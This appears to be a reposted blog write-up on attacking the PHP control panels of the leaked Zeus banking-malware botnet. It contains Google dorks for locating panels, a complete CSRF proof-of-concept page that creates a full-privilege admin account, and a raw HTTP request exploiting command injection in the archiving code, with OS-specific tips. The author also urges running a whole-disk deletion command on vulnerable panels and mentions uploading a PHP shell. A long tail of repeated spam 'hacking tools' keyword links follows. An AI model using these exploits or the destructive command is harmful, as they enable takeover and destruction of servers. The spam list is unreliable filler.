Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:

• inurl:cp.php?m=login - this should be the login to the control panel
• inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
• inurl:install/index.php - this should be deleted, but I think this is useless now.

Boring vulns found

• Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
• No password policy - admins can set up really weak passwords
• No anti brute-force - you can try to guess the admin's password. Default username is admin
• Password autocomplete enabled - boring
• Missing HttpOnly flag on session cookie - it could be nice if I could find any XSS. I need more time to find one!
• No CSRF protection - except on the password change, where the old password is needed :-( boring

Update: You can use the CSRF to create a new user with admin privileges:

<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html> 

• MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
• ClickJacking - really boring stuff
• Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
• SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)

The following stuff looks good, at least some vulns were taken seriously:

• The system directory is protected with .htaccess deny from all.
• gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
• Anti XSS: the following code is used almost everywhere

return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');

My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)

And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:

POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1 

because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)

Related posts

1. Termux Hacking Tools 2019
2. Hacking Tools Download
3. Hacker Tools Apk
4. How To Hack
5. Hack Website Online Tool
6. Pentest Tools Kali Linux
7. Pentest Box Tools Download
8. Pentest Box Tools Download
9. Hacking Tools Usb
10. Hacker Tools For Mac
11. Pentest Tools
12. Pentest Tools Kali Linux
13. Pentest Tools Find Subdomains
14. Tools Used For Hacking
15. Pentest Tools Nmap
16. Top Pentest Tools
17. Wifi Hacker Tools For Windows
18. Hack Apps
19. Hacking Tools Download
20. Hacker Tools Windows
21. Hacker Tools Linux
22. What Are Hacking Tools
23. Hacking Tools Hardware
24. Pentest Box Tools Download
25. How To Hack
26. Hacker Search Tools
27. Hack Tools
28. Pentest Tools For Ubuntu
29. Hacker Hardware Tools
30. Hacker Tools For Pc
31. Hack Tools Pc
32. Blackhat Hacker Tools
33. Pentest Tools Port Scanner
34. Hacking Tools
35. Hacking Tools For Mac
36. Hack Tools For Games
37. Hacking Tools For Kali Linux
38. Hack Tools Github
39. Hack Tools For Pc
40. Pentest Tools Nmap
41. Hacker Tools Apk Download
42. Physical Pentest Tools
43. Hacking App
44. Hacking Tools Windows 10
45. Pentest Tools Online
46. Hacking Tools 2020
47. Hack Tools Pc
48. Hacker Tools 2019
49. Hack Website Online Tool
50. Hacker Tools For Pc
51. Hacking Tools And Software
52. Pentest Box Tools Download
53. Black Hat Hacker Tools
54. Hack Tools For Games
55. Pentest Tools For Ubuntu
56. Tools For Hacker
57. Pentest Tools Url Fuzzer
58. Hacking Tools For Kali Linux
59. Pentest Tools Subdomain
60. Hacks And Tools
61. Hacker Tools For Pc
62. Hack Tools
63. Hacker Tools Mac
64. Pentest Tools Url Fuzzer
65. Hacking Tools Download
66. Blackhat Hacker Tools
67. Hacking Tools Mac
68. Hacker Tools Software
69. Pentest Tools
70. Hacker Tools 2020
71. Hacking Tools For Windows
72. Easy Hack Tools
73. Hacking Tools For Games
74. Hack Tools
75. Hack Website Online Tool
76. Hacking Tools Usb
77. Hacking Tools Software
78. Hack App
79. Pentest Tools Windows
80. Hacking Tools Download
81. Hacker Tools For Pc
82. Pentest Tools Url Fuzzer
83. Termux Hacking Tools 2019
84. Pentest Tools Framework
85. Hack And Tools
86. Hack Tools For Ubuntu
87. Hack Tools Pc
88. Hacker Search Tools
89. Hacking Tools For Games
90. Hacking Tools Software
91. Pentest Tools Port Scanner
92. Tools For Hacker
93. Best Hacking Tools 2019
94. Best Hacking Tools 2020
95. Install Pentest Tools Ubuntu
96. Pentest Tools List
97. Pentest Tools For Ubuntu
98. Top Pentest Tools
99. Hack Tools Pc
100. Hacker
101. Physical Pentest Tools
102. Pentest Recon Tools
103. Hacker Tools Hardware
104. Blackhat Hacker Tools
105. Hacking Tools Github
106. Pentest Tools Bluekeep
107. Hacker Tools For Ios
108. Pentest Tools Online
109. Hacking Tools For Windows 7
110. New Hacker Tools
111. Pentest Tools Nmap
112. Pentest Automation Tools
113. Physical Pentest Tools
114. Pentest Reporting Tools
115. Pentest Tools
116. Tools 4 Hack
117. Hacker Techniques Tools And Incident Handling
118. Hack Tools
119. Hacker Tools Online
120. Pentest Tools Framework
121. What Are Hacking Tools
122. Hacker Tools Linux
123. Hacker Tools Apk Download
124. Hack Tools Github
125. Pentest Tools Android
126. Hack Tools For Mac
127. Pentest Tools For Mac
128. Free Pentest Tools For Windows
129. Hacking Tools Kit
130. Hack And Tools
131. Pentest Tools For Windows
132. Hacking Apps
133. Hack App
134. Hacking Tools Name
135. Hacker Tools For Ios
136. Hacking App
137. Nsa Hacker Tools
138. Hacking Tools For Games
139. Hack Tools Mac
140. Hacking Tools Mac
141. Hacking Tools For Pc
142. Pentest Tools For Mac
143. Hackrf Tools
144. Pentest Tools
145. Pentest Tools List
146. Pentest Reporting Tools
147. Tools Used For Hacking
148. Hacking Tools Windows 10
149. Hacking Tools
150. Pentest Tools Port Scanner
151. Pentest Tools Website
152. Hacking Apps